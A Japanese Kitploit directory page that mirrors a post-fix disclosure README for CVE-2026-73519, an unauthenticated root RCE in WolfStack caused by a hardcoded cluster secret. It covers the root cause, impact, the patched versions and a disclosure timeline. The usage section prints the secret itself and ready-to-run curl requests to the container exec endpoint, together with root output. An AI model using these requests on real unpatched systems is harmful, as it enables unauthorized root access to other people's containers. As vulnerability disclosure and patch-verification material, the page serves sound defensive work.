Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-73519-WolfStack-PoC — CVE-2026-73519 の PoC - WolfStack のハードコードされたクラスタシークレットによる未認証 RCE(CVSS 9.8) | Kitploit
ツール/GitHubGitHub/squeeze440/cve-2026-73519-wolfstack-poc
コンテナセキュリティ脆弱性分析エクスプロイトウェブアプリケーション悪用認証APIセキュリティ
GitHubsqueeze440/cve-2026-73519-wolfstack-poc

CVE-2026-73519-WolfStack-PoC

CVE-2026-73519 の PoC - WolfStack のハードコードされたクラスタシークレットによる未認証 RCE(CVSS 9.8)

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る
422日前未レビュー

CVE-2026-73519 — WolfStack ハードコード済みクラスターシークレット → 非認証RCE

WolfStack に存在するハードコード済みデフォルト認証シークレットの PoC です。これにより、リモートの非認証攻撃者が管理下の任意の Docker/LXC コンテナ内で root として任意のコマンドを実行できます。

CVECVE-2026-73519
CNAVulnCheck
AdvisoryGHSA-r3mw-2wmq-j6jg · VulnCheck writeup
CVSS 3.19.8 Critical — AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CWECWE-798 (ハードコード済み資格情報), CWE-306 (重要な機能に対する認証の欠如)
影響を受けるバージョンv25.9.0 以前 / インストール毎のシークレット移行が完了していない任意のノード
修正済みバージョンv25.9.2 / v25.9.3
クレジットDostxodjayev Abdullox (@squeeze440)

根本原因

src/auth/mod.rs:32 には、すべての WolfStack ビルドに埋め込まれた単一のハードコード済みシークレットが同梱されています:

root@kitploit:~
const CLUSTER_SECRET: &str = "wsk_a7f3b9e2c1d4f6a8b0e3d5c7f9a1b3d5e7f9a1c3b5d7e9f0a2b4c6d8e0f1a3";

auth::default_secret_accepted() (src/auth/mod.rs:430-460) は、オペレーターが明示的にオプトアウトしている (WOLFSTACK_REJECT_DEFAULT_SECRET=1) か、既にカスタムシークレットにローテーションしている場合を除き、この定数をデフォルトで有効な資格情報として受け入れます。REST API 全体を保護する唯一のゲートである api::require_auth() (src/api/mod.rs:518-535) は、一致する X-WolfStack-Secret ヘッダーを伴うリクエストを完全に認証済みとして扱います — セッションも API キーもアカウントも不要です。

このゲートは POST /api/containers/{runtime}/{id}/exec (src/api/mod.rs:7145-7167) を保護しており、呼び出し元が指定したコマンド文字列を対象コンテナ内でそのまま実行します。公開ソース(またはこのリポジトリ)を読んだ人は誰でも、信頼されたクラスターピアとして認証され、ノードが管理する任意のコンテナ内で root として任意のコマンドを実行できます。

今回のリリースサイクルで追加されたインストール毎のシークレット自動生成は、シークレットファイルが存在せず、かつ記録されたピアもないノードでのみ発動します (src/auth/mod.rs:250-261)。アップグレードされたノード、文書化された起動時レースに該当するノード、または設定パスが書き込み不可能なノードは、ログ行による警告のみで、共有デフォルトのまま無期限に留まります。

使用方法

TARGET と CONTAINER を、テストを許可された WolfStack インスタンスとコンテナに指定し、次を実行します:

root@kitploit:~
./poc.sh http://TARGET:8553 CONTAINER_NAME

または手動で:

root@kitploit:~
# 非認証 — 拒否される
curl -s -X POST http://TARGET:8553/api/containers/docker/CONTAINER_NAME/exec \
  -H "Content-Type: application/json" -d '{"command":"whoami"}'
# -> {"error":"Not authenticated"}  HTTP 401

# src/auth/mod.rs:32 のハードコード済みシークレット — ログインなしで root として完全な RCE
curl -s -X POST http://TARGET:8553/api/containers/docker/CONTAINER_NAME/exec \
  -H "Content-Type: application/json" \
  -H "X-WolfStack-Secret: wsk_a7f3b9e2c1d4f6a8b0e3d5c7f9a1b3d5e7f9a1c3b5d7e9f0a2b4c6d8e0f1a3" \
  -d '{"command":"id; hostname"}'
# -> {"exit_code":0,"ok":true,"stdout":"uid=0(root) gid=0(root) ...\n<container-id>\n"}  HTTP 200

PoC ターミナル出力 — 非認証リクエストは拒否され、その後の同じリクエストにハードコード済み X-WolfStack-Secret ヘッダーを付けると、稼働中のコンテナ内部から root コマンドの出力が返される

チェックサム検証済みの正規の v25.9.0 リリースバイナリ (sha256 82aab42b6ab17a146aa5a108f090b15c6c4bee8159f67e735deb533a437c207c) と、対象として実際の alpine:latest コンテナを使用して検証済みです。応答出力に含まれるコンテナ ID は、被害ホスト上の docker ps の結果と一致します。

影響

  • 認証なしでホスト上のすべての Docker/LXC コンテナを列挙する (/api/containers/docker, /api/containers/lxc)。
  • 同じヘッダーを使用して、そのいずれかの内部で root として任意のコマンドを実行する。
  • 同じバイパスは、その他すべての require_auth で保護されたルート (ピア/ノード管理、バックアップなど) にも到達します — この PoC は最も明確な影響としてコンテナ exec シンクを対象にしており、網羅的なリストではありません。

修正方法

v25.9.2 以降にアップグレードしてください。メンテナーはデフォルトシークレットの受け入れをデフォルト拒否に変更し、既存インストール向けの強制ローテーションパスを追加しました。

開示のタイムライン

  • 2026-07-31 — GitHub Security Advisories 経由でメンテナーに報告。
  • メンテナーが v25.9.2 / v25.9.3 で修正をリリース。
  • 2026-08-08 — CVE 割り当てのため VulnCheck に提出 (既に公開済みのファストレーン)。
  • 2026-08-16 — VulnCheck により CVE-2026-73519 が割り当てられる。

免責事項

修正のリリースと CVE 割り当ての後に、防御/教育目的で公開されています — 自社のインフラストラクチャ上でパッチ適用状況を確認するためです。所有していないシステム、または明示的なテスト許可がないシステムに対してこれを実行しないでください。

ツールをダウンロード